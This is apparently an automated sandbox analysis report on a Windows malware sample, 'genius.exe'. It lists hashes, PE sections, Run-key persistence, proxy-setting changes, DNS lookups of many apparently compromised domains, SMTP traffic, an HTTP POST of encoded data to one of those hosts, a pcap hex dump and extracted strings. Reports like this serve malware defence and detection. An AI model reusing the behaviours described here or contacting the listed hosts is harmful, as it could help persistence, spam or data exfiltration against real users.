Analysis Date2014-09-12 23:33:10
MD524f91252356183c77b8d17e4342e52c0
SHA1a615d1c975f5b11d66a5491d6b3e8acd25ef1c30

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 70d9acc42bbccbef7fd4d6e184baa939 sha1: 21349ea89a1ea84e5ffe0ab0462b14d61d214d3a size: 1024
Section.rdata md5: 3b7e67fb1ccbaf9bb4216814816e91ba sha1: a504a5735b53f6fc5724d26ba09482a9b5a539e1 size: 1024
Section.data md5: 8589a20c5b7c3de3ece563f3962530f5 sha1: a560db31a64b2cb913c2f420f09dd8019f05ca82 size: 1024
Section.rsrc md5: 3107e974ed3c2c6368c39ae6dd63397b sha1: ac3b63b9e76a9f9824ae365afbe43c27d7d3e39b size: 42496
Timestamp2014-06-30 05:04:01
VersionLegalCopyright: Copyright (C) 2009
InternalName: genius
FileVersion: 8,2,3,23
ProductName: genius Application
ProductVersion: 2,3,3,22
FileDescription: genius Application
OriginalFilename: genius.exe
PEhash6e64e2bc7e9c5734cb990f59fdf8338784c8987d
IMPhashf0855f86d5b3050322afa714b88b2ec1

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\wisaghavadti ➝
C:\Documents and Settings\Administrator\wisaghavadti.exe
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\software\microsoft\windows\currentversion\AppManagement ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\nisekotourism[1].htm
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\coolbsuhouses[1].htm
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Crypto\RSA\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\a18ca4003deb042bbee7a40f15e1970b_666939c9-243b-475e-9504-51724db22670
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\leads.com[1].htm
Creates FileC:\Documents and Settings\Administrator\wisaghavadti.exe
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\americangeriatrics[1].htm
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\momsbestfriend[1].htm
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\eurofilms[1].htm
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\ocdburgos[1].htm
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\atre-ebisu-6fdental[1].htm
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\1banhope[1].htm
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\ylbrand[1].htm
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\ljecmetal.com.didtheyreadit[1].htm
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\oiler.com[1].htm
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\ocdburgos[1].htm
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\nisekotourism[1].htm
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\1banhope[1].htm
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\atre-ebisu-6fdental[1].htm
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\ylbrand[1].htm
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\ljecmetal.com.didtheyreadit[1].htm
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\coolbsuhouses[1].htm
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\leads.com[1].htm
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\americangeriatrics[1].htm
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\momsbestfriend[1].htm
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\eurofilms[1].htm
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\oiler.com[1].htm
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutexwisaghavadti
Winsock DNSgsprinters.com
Winsock DNSamericangeriatrics.org
Winsock DNSkheldon.net
Winsock DNSaxisdanceshoes.com
Winsock DNSylbrand.com
Winsock DNSoiler.com.pl
Winsock DNSingimex.com
Winsock DNSljecmetal.com.didtheyreadit.com
Winsock DNSleads.com.my
Winsock DNSeurofilms.com
Winsock DNSsekretuspeha.com
Winsock DNS1banhope.com
Winsock DNSfifthhousepr.com
Winsock DNSgreciahouse.it
Winsock DNSatre-ebisu-6fdental.com
Winsock DNSnisekotourism.com
Winsock DNScoolbsuhouses.com
Winsock DNSocdburgos.org
Winsock DNSmomsbestfriend.com
Winsock DNS89gospel.com

Network Details:

DNSsmtp.glbdns2.microsoft.com
Type: A
65.55.176.126
DNSsmtp.mail.us.am0.yahoodns.net
Type: A
98.138.105.21
DNSsmtp.mail.us.am0.yahoodns.net
Type: A
98.139.211.125
DNSsmtp.mail.us.am0.yahoodns.net
Type: A
63.250.193.228
DNSmomsbestfriend.com
Type: A
72.47.228.224
DNSnisekotourism.com
Type: A
64.207.186.185
DNScoolbsuhouses.com
Type: A
68.178.153.218
DNSleads.com.my
Type: A
208.91.198.111
DNSeurofilms.com
Type: A
85.92.85.168
DNSamericangeriatrics.org
Type: A
198.154.232.208
DNSljecmetal.com.didtheyreadit.com
Type: A
91.103.4.78
DNSgsprinters.com
Type: A
50.193.47.120
DNSaxisdanceshoes.com
Type: A
64.5.41.209
DNSsmtp.live.com
Type: A
DNSsmtp.mail.yahoo.com
Type: A
DNSocdburgos.org
Type: A
DNSatre-ebisu-6fdental.com
Type: A
DNSkheldon.net
Type: A
DNSylbrand.com
Type: A
DNS1banhope.com
Type: A
HTTP POSThttp://coolbsuhouses.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Flows TCP192.168.1.1:1031 ➝ 65.55.176.126:25
Flows TCP192.168.1.1:1032 ➝ 98.138.105.21:25
Flows TCP192.168.1.1:1037 ➝ 68.178.153.218:80

Raw Pcap
0x00000000 (00000)   504f5354 202f2048 5454502f 312e310d   POST / HTTP/1.1.
0x00000010 (00016)   0a416363 6570743a 202a2f2a 0d0a4163   .Accept: */*..Ac
0x00000020 (00032)   63657074 2d4c616e 67756167 653a2065   cept-Language: e
0x00000030 (00048)   6e2d7573 0d0a436f 6e74656e 742d5479   n-us..Content-Ty
0x00000040 (00064)   70653a20 6170706c 69636174 696f6e2f   pe: application/
0x00000050 (00080)   6f637465 742d7374 7265616d 0d0a436f   octet-stream..Co
0x00000060 (00096)   6e74656e 742d4c65 6e677468 3a203439   ntent-Length: 49
0x00000070 (00112)   360d0a55 7365722d 4167656e 743a204d   6..User-Agent: M
0x00000080 (00128)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000090 (00144)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x000000a0 (00160)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x000000b0 (00176)   3b205356 31290d0a 486f7374 3a20636f   ; SV1)..Host: co
0x000000c0 (00192)   6f6c6273 75686f75 7365732e 636f6d0d   olbsuhouses.com.
0x000000d0 (00208)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x000000e0 (00224)   702d416c 6976650d 0a436163 68652d43   p-Alive..Cache-C
0x000000f0 (00240)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000100 (00256)   0d0a0d0a 39736a52 6e726561 54786866   ....9sjRnreaTxhf
0x00000110 (00272)   7a38414b 4a726a39 53774153 667a6874   z8AKJrj9SwASfzht
0x00000120 (00288)   5156784c 32374571 314b337a 59685832   QVxL27Eq1K3zYhX2
0x00000130 (00304)   58534835 44657177 674f5976 582b6b72   XSH5DeqwgOYvX+kr
0x00000140 (00320)   45726177 0d0a6633 61775561 7459534e   Eraw..f3awUatYSN
0x00000150 (00336)   4f547356 4d2f7a75 4b486e65 414a6745   OTsVM/zuKHneAJgE
0x00000160 (00352)   7767486f 7a304656 646d2b36 59586b35   wgHoz0FVdm+6YXk5
0x00000170 (00368)   4a653872 44424742 73534d4b 37574d6f   Je8rDBGBsSMK7WMo
0x00000180 (00384)   41575667 50770d0a 30456531 486c4462   AWVgPw..0Ee1HlDb
0x00000190 (00400)   4b577379 32513848 796f636b 4d36416f   KWsy2Q8HyockM6Ao
0x000001a0 (00416)   2f506b68 35417244 2b447030 4f6a3552   /Pkh5ArD+Dp0Oj5R
0x000001b0 (00432)   444f526b 55317765 36426d30 7566536b   DORkU1we6Bm0ufSk
0x000001c0 (00448)   55356178 6a52426d 0d0a4159 46364273   U5axjRBm..AYF6Bs
0x000001d0 (00464)   6f754c44 45475863 396a6b59 347a4167   ouLDEGXc9jkY4zAg
0x000001e0 (00480)   57477331 56543973 4f50494e 4f446435   WGs1VT9sOPINODd5
0x000001f0 (00496)   6c543475 48727733 465a6d70 36336631   lT4uHrw3FZmp63f1
0x00000200 (00512)   2f786142 44687633 4b450d0a 76444b74   /xaBDhv3KE..vDKt
0x00000210 (00528)   46332f43 56786868 3176706d 4f384e61   F3/CVxhh1vpmO8Na
0x00000220 (00544)   55333371 47533042 4a79644f 794b7065   U33qGS0BJydOyKpe
0x00000230 (00560)   446f6834 766e4f6c 54457074 722f4677   Doh4vnOlTEptr/Fw
0x00000240 (00576)   3136644a 6a394246 6a424870 0d0a5142   16dJj9BFjBHp..QB
0x00000250 (00592)   36535a5a 74634235 72497a61 416d664b   6SZZtcB5rIzaAmfK
0x00000260 (00608)   39756776 37575241 79373757 346d634e   9ugv7WRAy77W4mcN
0x00000270 (00624)   31496871 2f416e59 73574159 2b645561   1Ihq/AnYsWAY+dUa
0x00000280 (00640)   4a527651 6f504c4c 436a4559 37690d0a   JRvQoPLLCjEY7i..
0x00000290 (00656)   654a3879 434f4f2b 46485074 61557163   eJ8yCOO+FHPtaUqc
0x000002a0 (00672)   35514367 3373706f 42367650 4a62696d   5QCg3spoB6vPJbim
0x000002b0 (00688)   48477243 6c753369 56683536 6a7a574b   HGrClu3iVh56jzWK
0x000002c0 (00704)   336b317a 4b6f5957 4d734a75 47467367   3k1zKoYWMsJuGFsg
0x000002d0 (00720)   0d0a7162 6237352b 672b6d31 6844456d   ..qbb75+g+m1hDEm
0x000002e0 (00736)   354d6561 3364744f 47575858 4d376c48   5Mea3dtOGWXXM7lH
0x000002f0 (00752)   426e0d0a                              Bn..


Strings
x

041904b0
2,3,3,22
8,2,3,23
absolutely
accordingly exactly
adore pregnant ashamed
&always
&and--always surrender
apparently better
&appealed anything
beauty fruition windows
because people
Behind
between
&brute Elizabethan
business
Carr?? tenderness
church
&clever
completely
complying geography present
consider London sense casual
contained
Copyright (C) 2009
costume morrow
counted
cousins appearance
Dashwood
decent
demanded interesting
&desultory completely
different seeing
discomfort
distinctness seeing
document pittore
effect feelings
encourage brush
entanglements
everything
exclaim personage reason Peter2moment fairest elected haunted things Carr?? words
expressed sociable
FileDescription
FileVersion
genius
genius Application
genius.exe
gentlemen disappointment old-fashioned paint
greeted painter return gesture
happened
hard--it somewhere again
&her--he
holiday
Hoppuss observe yours speaking
&INDEMNITY
interlocutor
InternalName
&irritation
judged cousins--their
&knowledge
&knowledge intimacy;
least
LegalCopyright
&leisure spoken
&lovely
manners elements
&married triumph
matrons
method remember
moment
month bazaar
mother cleared
mother theatre Shakespeare
MS Shell Dlg
&opined
OriginalFilename
&other manifestation
otherwise
panels
people unmolested
Peters
&possibilities
ProductName
ProductVersion
&profanity that--he
&profit wished
&proved simple
public
question
quickly
&rather mother
&really
receiving London creations
&revelations magnificently
RichEdit20A
&Rosedale
'Rosedale things custom minute professed
&sentiment
+should ambitions--tremendous talked bargain%daughter say--Nick particular freedom
sitting
smiling stared;
&sort--I
statutes
Still
StringFileInfo
studio
&studio
sufficient things feared
SysListView32
Tahoma
theatre
&things
things brightly
&thought laughed
to-day
toward there sister inconsistent
Translation
travelled trifler
truths
turned
VarFileInfo
vision
visit presumably
volition(though particular vague moreover thought'lighter mirror everything on--in critic
voracity derive dropped strictness
VS_VERSION_INFO
weaken myself
whether
wonderful
would Calcutta
&would individually
wounds; Dormer
&write
0]0x=f
2^fdm0B
3#BPmy
5}`DYo
5y&lD('
8L+.xL
ADUOXYVW
AsTsA`1
BG`;GM
BnR8E~
clZuS\Z
+CnnIK<
CreateWindowExA
cv?@K%C
@.data
DefWindowProcA
deg	<?fW
Dg_GX1
DispatchMessageA
dv!g<t
'.+D)x
edh$#B
F9r<jP
FindResourceA
)<!FPq
:g1f_V&
gatFFwewqyt qwje
GetCurrentThreadId
GetMessageA
GetModuleHandleA
GetProcessHeap
gMd*K,
gS"'SE
,#]$H"c%$
HeapAlloc
im{*[73
J|lb"K"
K08M3<
kernel32.dll
KillTimer
lAb|VT
LoadCursorA
LoadIconA
LoadResource
@nCn-k6M%
:NCT=eO
nKj[Vl
NNA|!S
OM\\MOzvS! 0
~O:q` 
PostQuitMessage
*=pSb$
 	p%W"
P(+(zM
rCy0s<
`.rdata
Rd	(FK3
RegisterClassExA
-SDMHB
SetTimer
ShowWindow
svchost
t3y-cu
/t{69T
!This program cannot be run in DOS mode.
TranslateMessage
TS>0<y
TwxKz!
[U<K(s
UpdateWindow
user32.dll
!v5%1J
|$vWa/r
-.Wb}$
"x3a'N
{~~_Yx